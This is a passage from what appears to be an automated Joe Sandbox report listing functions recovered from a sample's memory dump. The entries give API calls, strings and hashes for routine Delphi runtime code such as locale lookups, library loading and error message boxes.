lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02E46C14,02E40000,02E6E790), ref: 02E45A06
FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02E46C14,02E40000,02E6E790), ref: 02E45A19
FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02E46C14,02E40000,02E6E790), ref: 02E45A2B
lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02E46C14,02E40000,02E6E790), ref: 02E45A37
lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02E46C14,02E40000), ref: 02E45A6B
lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02E46C14), ref: 02E45A77
lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02E45A99

Strings

kernel32.dll, xrefs: 02E45920
\, xrefs: 02E45A49
GetLongPathNameA, xrefs: 02E45933

Memory Dump Source

Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e40000_x.jbxd

Similarity

API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
String ID: GetLongPathNameA$\$kernel32.dll
API String ID: 3245196872-1565342463
Opcode ID: ff8cff46548b71ed7f399e0c82dd75e74a17bc5b85319b4ecf6a3bb55045bebd
Instruction ID: 827b13d7083c84add1cd302faf341ab85b672ce1a4791bc7fe2b74d2e942be09
Opcode Fuzzy Hash: ff8cff46548b71ed7f399e0c82dd75e74a17bc5b85319b4ecf6a3bb55045bebd
Instruction Fuzzy Hash: 32417271D80229AFDF10DBE8DC88ADEB3BDAF08344F4499A6A558E7241DB309A44DF54

Function 02E45BD8 Relevance: 15.1, APIs: 10, Instructions: 98stringlibrarythreadCOMMON

Download Yara Rule

APIs

lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02E45BE8
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02E45BF5
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02E45BFB
lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02E45C26
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02E45C6D
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02E45C7D
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02E45CA5
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02E45CB5
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02E45CDB
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02E45CEB

Strings

Software\Borland\Locales, xrefs: 02E45AFC, 02E45B1A
Software\Borland\Delphi\Locales, xrefs: 02E45B38

Memory Dump Source

Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e40000_x.jbxd

Similarity

API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1599918012-2375825460
Opcode ID: 8b0727ff8eacdafd1fa5d25497bf18fe7d1f96c39f01eed16574b8fc4031b0a7
Instruction ID: ba546dee17be8bf66c2d13b567e0b8daf5c5750c9f949f0009dd60419375485b
Opcode Fuzzy Hash: 8b0727ff8eacdafd1fa5d25497bf18fe7d1f96c39f01eed16574b8fc4031b0a7
Instruction Fuzzy Hash: 5B31C772E8026C2AEF25DAB4AC45FDE77AD9B04384F4491A1AA08E61C0DF749F848F54

Function 02E47FD4 Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02E47FF5

Memory Dump Source

Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e40000_x.jbxd

Similarity

API ID: DiskFreeSpace
String ID:
API String ID: 1705453755-0
Opcode ID: 6da40a96276824e7acf15013fedfea5da185deed3b000be9258f4dab930fd872
Instruction ID: 1f9ab5f00ac4ac6c5ac5536ea8810bdcd51c362d5292059f0998df53349d6f38
Opcode Fuzzy Hash: 6da40a96276824e7acf15013fedfea5da185deed3b000be9258f4dab930fd872
Instruction Fuzzy Hash: 7811DEB5E00209AF9B04CF99CC81DAFF7F9FFC9304F54C569A509E7254E671AA018BA0

Function 02E4A7C4 Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02E4A7E2

Memory Dump Source

Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e40000_x.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: e4a4f5238fe2b89d356e7e49d78e4b786299a6a1796c12883d610745802d8045
Instruction ID: f50654008ef816edf25f79f86b2a61a75fb5e8310b3420d361b94665b9391c0c
Opcode Fuzzy Hash: e4a4f5238fe2b89d356e7e49d78e4b786299a6a1796c12883d610745802d8045
Instruction Fuzzy Hash: 01E0D87278421417D711A558BC84EF6725D975C310F00D2BAFD05C73C5EDF09E804AE4

Function 02E4B78C Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?,02E6D106,00000000,02E6D11E), ref: 02E4B79A

Memory Dump Source

Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e40000_x.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: c5e50f4870e5dfc51d6c2223f87ff41bdc414d90cba7c078d86739b2eaa94425
Instruction ID: 0b3b7bf81835930ce9669dff4e4c9b31806bccc6778bd4a562869518144bed92
Opcode Fuzzy Hash: c5e50f4870e5dfc51d6c2223f87ff41bdc414d90cba7c078d86739b2eaa94425
Instruction Fuzzy Hash: FEF0F9789843018FD340DF2AE44AE1677E9FB44B84F449D28E694C7380EB34E454CB52

Function 02E4A810 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,02E4BE72,00000000,02E4C08B,?,?,00000000,00000000), ref: 02E4A823

Memory Dump Source

Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e40000_x.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: d4400675b37800bae6f97b663feac51f5f6a0a7098a31e52e30e5399d422cbaa
Instruction ID: b0212383e23a19f841399ac7de5b390b8b41e12117de103fad13caa69967b0ad
Opcode Fuzzy Hash: d4400675b37800bae6f97b663feac51f5f6a0a7098a31e52e30e5399d422cbaa
Instruction Fuzzy Hash: D2D05EA238E2602AA210915A3D88DBB5ADCCACA7B1F00907AB988C6201D6118C07DBB1

Function 02E4920C Relevance: 1.5, APIs: 1, Instructions: 6timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 02E49210

Memory Dump Source

Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e40000_x.jbxd

Similarity

API ID: LocalTime
String ID:
API String ID: 481472006-0
Opcode ID: 2011951a752d329e78ca378c5827ecb81dc4292a3beff4a2dc5c32cf1b86488c
Instruction ID: f62645ffff51595bfb5aae4e09081ff0a90df37bd09a968f87f6152c44c4fa4e
Opcode Fuzzy Hash: 2011951a752d329e78ca378c5827ecb81dc4292a3beff4a2dc5c32cf1b86488c
Instruction Fuzzy Hash: F7A0128044492041854033181C0253430445851A20FC4C7807CF8402D0ED1D01208093

Function 02E420C4 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e40000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290

Function 02E4D294 Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 02E4D29D

Part of subcall function 02E4D268: GetProcAddress.KERNEL32(00000000), ref: 02E4D281

Strings

VarIdiv, xrefs: 02E4D345
VarCmp, xrefs: 02E4D3B3
VarMul, xrefs: 02E4D319
VarDateFromStr, xrefs: 02E4D40B
VarCyFromStr, xrefs: 02E4D421
VarI4FromStr, xrefs: 02E4D3C9
VarNeg, xrefs: 02E4D2C1
VarDiv, xrefs: 02E4D32F
VarSub, xrefs: 02E4D303
VarBstrFromDate, xrefs: 02E4D463
VarR4FromStr, xrefs: 02E4D3DF
VarBstrFromCy, xrefs: 02E4D44D
VarMod, xrefs: 02E4D35B
oleaut32.dll, xrefs: 02E4D298
VariantChangeTypeEx, xrefs: 02E4D2AB
VarXor, xrefs: 02E4D39D
VarOr, xrefs: 02E4D387
VarAdd, xrefs: 02E4D2ED
VarR8FromStr, xrefs: 02E4D3F5
VarAnd, xrefs: 02E4D371
VarNot, xrefs: 02E4D2D7
VarBoolFromStr, xrefs: 02E4D437
VarBstrFromBool, xrefs: 02E4D479

Memory Dump Source

Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e40000_x.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
API String ID: 1646373207-1918263038
Opcode ID: e2d3fc563c27f41b0ab6c44778889dd86421a5c1710672106f2118b30ac88911
Instruction ID: 075e808649f33da3b6e4e2ebf39d65b0fec21f62b8c1e4b778db786e8aa672d0
Opcode Fuzzy Hash: e2d3fc563c27f41b0ab6c44778889dd86421a5c1710672106f2118b30ac88911
Instruction Fuzzy Hash: 3E41EFA1AC92085B56186AAE7C02427F79ED784A143F0F55AF808CB754DE24FC92CE6D

Function 02E56ED8 Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 32libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ole32.dll), ref: 02E56EDE
GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02E56EEF
GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02E56EFF
GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02E56F0F
GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02E56F1F
GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02E56F2F
GetProcAddress.KERNEL32(00000000,CoSuspendClassObjects), ref: 02E56F3F

Strings

CoCreateInstanceEx, xrefs: 02E56EE9
CoSuspendClassObjects, xrefs: 02E56F39
ole32.dll, xrefs: 02E56ED9
CoInitializeEx, xrefs: 02E56EF9
CoResumeClassObjects, xrefs: 02E56F29
CoReleaseServerProcess, xrefs: 02E56F19
CoAddRefServerProcess, xrefs: 02E56F09

Memory Dump Source

Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e40000_x.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
API String ID: 667068680-2233174745
Opcode ID: cbaff14ec414b9e988f5db0dbcd49c6a79cf88dd7bf7657e5f2e21429efb4201
Instruction ID: 947f6355517e600e94d67d7f6e8fbed8e23b2ed1546b76a90df6d807d3021f41
Opcode Fuzzy Hash: cbaff14ec414b9e988f5db0dbcd49c6a79cf88dd7bf7657e5f2e21429efb4201
Instruction Fuzzy Hash: D3F01CE4ED83906EFE00BF776C85C27275DA621688388FC95FC0369582EE7694588F31

Function 02E42530 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 254windowCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 02E428CE

Strings

Unexpected Memory Leak, xrefs: 02E428C0
The sizes of unexpected leaked medium and large blocks are: , xrefs: 02E42849
, xrefs: 02E42814
bytes: , xrefs: 02E4275D
The unexpected small block leaks are:, xrefs: 02E42707
String, xrefs: 02E427A1
Unknown, xrefs: 02E4278C
7, xrefs: 02E426A1
An unexpected memory leak has occurred. , xrefs: 02E42690

Memory Dump Source

Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e40000_x.jbxd

Similarity

API ID: Message
String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
API String ID: 2030045667-32948583
Opcode ID: ffac67e86981970c5dc5e0d312fad79634ec739b40545042668cf0bee4306815
Instruction ID: 70e69b9f6f7bc9486762146e7c0386f2f3bb07da1895eab2effcf3d9447e6111
Opcode Fuzzy Hash: ffac67e86981970c5dc5e0d312fad79634ec739b40545042668cf0bee4306815
Instruction Fuzzy Hash: 97A11430E842548BDF21AA2CEC84BD8B6E5EB08354F14A0E5FE49AB385CF7599C5CF51

Function 02E4252E Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 188COMMON

Download Yara Rule

Strings

Unexpected Memory Leak, xrefs: 02E428C0
The sizes of unexpected leaked medium and large blocks are: , xrefs: 02E42849
, xrefs: 02E42814
bytes: , xrefs: 02E4275D
The unexpected small block leaks are:, xrefs: 02E42707
7, xrefs: 02E426A1
An unexpected memory leak has occurred. , xrefs: 02E42690

Memory Dump Source

Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e40000_x.jbxd

Similarity

API ID:
String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
API String ID: 0-2723507874
Opcode ID: 747eff63f39f372955d4fd987e113a7927f2bb3f9c06b642268ea7a060cb423a
Instruction ID: a9c7d869ca71eb7d497ec8568f8ee7b48c70e067ea580663f048d532572b51c1
Opcode Fuzzy Hash: 747eff63f39f372955d4fd987e113a7927f2bb3f9c06b642268ea7a060cb423a
Instruction Fuzzy Hash: 9B71E330E842988FDF219A2CDC84BD9BAE5EB09344F10A1E5FA49DB281DF754AC5CF51

Function 02E4BDC0 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(00000000,02E4C08B,?,?,00000000,00000000), ref: 02E4BDF6

Part of subcall function 02E4A7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02E4A7E2

Strings

m/d/yy, xrefs: 02E4BEC5
mmmm d, yyyy, xrefs: 02E4BEF2
:mm, xrefs: 02E4C029
:mm:ss, xrefs: 02E4C046
AMPM, xrefs: 02E4C00A
AMPM , xrefs: 02E4C019

Memory Dump Source

Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e40000_x.jbxd

Similarity

API ID: Locale$InfoThread
String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
API String ID: 4232894706-2493093252
Opcode ID: e5fecb33cbb0147addb49aec0820e58708470f6b7c486e47de6eb85e3358d89b
Instruction ID: 2f62199d2800ac0e3f1631e5b732b8fff256d442b4761a562eff5a9e32ecf6b2
Opcode Fuzzy Hash: e5fecb33cbb0147addb49aec0820e58708470f6b7c486e47de6eb85e3358d89b
Instruction Fuzzy Hash: B3611B35BC41889BDB10EBA4F861B9F76BB9B88300F60F435B1019B785DE39D946CB51

Function 02E5AFE0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 102COMMON

Download Yara Rule

APIs

IsBadReadPtr.KERNEL32(?,00000004), ref: 02E5B000
GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 02E5B017
IsBadReadPtr.KERNEL32(?,00000004), ref: 02E5B0AB
IsBadReadPtr.KERNEL32(?,00000002), ref: 02E5B0B7
IsBadReadPtr.KERNEL32(?,00000014), ref: 02E5B0CB

Strings

KernelBase, xrefs: 02E5B012
LoadLibraryExA, xrefs: 02E5B00D

Memory Dump Source

Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e40000_x.jbxd

Similarity

API ID: Read$HandleModule
String ID: KernelBase$LoadLibraryExA
API String ID: 2226866862-113032527
Opcode ID: 55f005616e1d7358bc1c13206e52e2edb0d6aeab4e5aa6358312e523518047d7
Instruction ID: a87c5992622f72bf48f63b19d4d8aad3022dbe5a73afe3567485b91b06bb7764
Opcode Fuzzy Hash: 55f005616e1d7358bc1c13206e52e2edb0d6aeab4e5aa6358312e523518047d7
Instruction Fuzzy Hash: 5C314F71A90315FBDB20DB69CC85F5AB7A8AF0535CF009554FE24EB2C5D730A940CB60

Function 02E4435C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02E44423,?,?,02EC67C8,?,?,02E6E7A8,02E465B1,02E6D30D), ref: 02E44395
WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02E44423,?,?,02EC67C8,?,?,02E6E7A8,02E465B1,02E6D30D), ref: 02E4439B
GetStdHandle.KERNEL32(000000F5,02E443E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02E44423,?,?,02EC67C8), ref: 02E443B0
WriteFile.KERNEL32(00000000,000000F5,02E443E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02E44423,?,?), ref: 02E443B6
MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 02E443D4

Strings

Error, xrefs: 02E443C8
Runtime error at 00000000, xrefs: 02E4438E, 02E443CD

Memory Dump Source

Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e40000_x.jbxd

Similarity

API ID: FileHandleWrite$Message
String ID: Error$Runtime error at 00000000
API String ID: 1570097196-2970929446
Opcode ID: 44296a998d41afe88a939ef56de369234808d4c0770df57d18a81bf00325366f
Instruction ID: a90af8ee4d40cf5f4b926950c81deac578831aef801d8242b82cc968e0f82cff
Opcode Fuzzy Hash: 44296a998d41afe88a939ef56de369234808d4c0770df57d18a81bf00325366f
Instruction Fuzzy Hash: 1BF0F0A4FC434074FA20A3E07C0BF69235C4704F6AF64EA14B328AC1C1CFA050C18B22

Function 02E4AEC4 Relevance: 10.6, APIs: 7, Instructions: 56filewindowCOMMON

Download Yara Rule

APIs

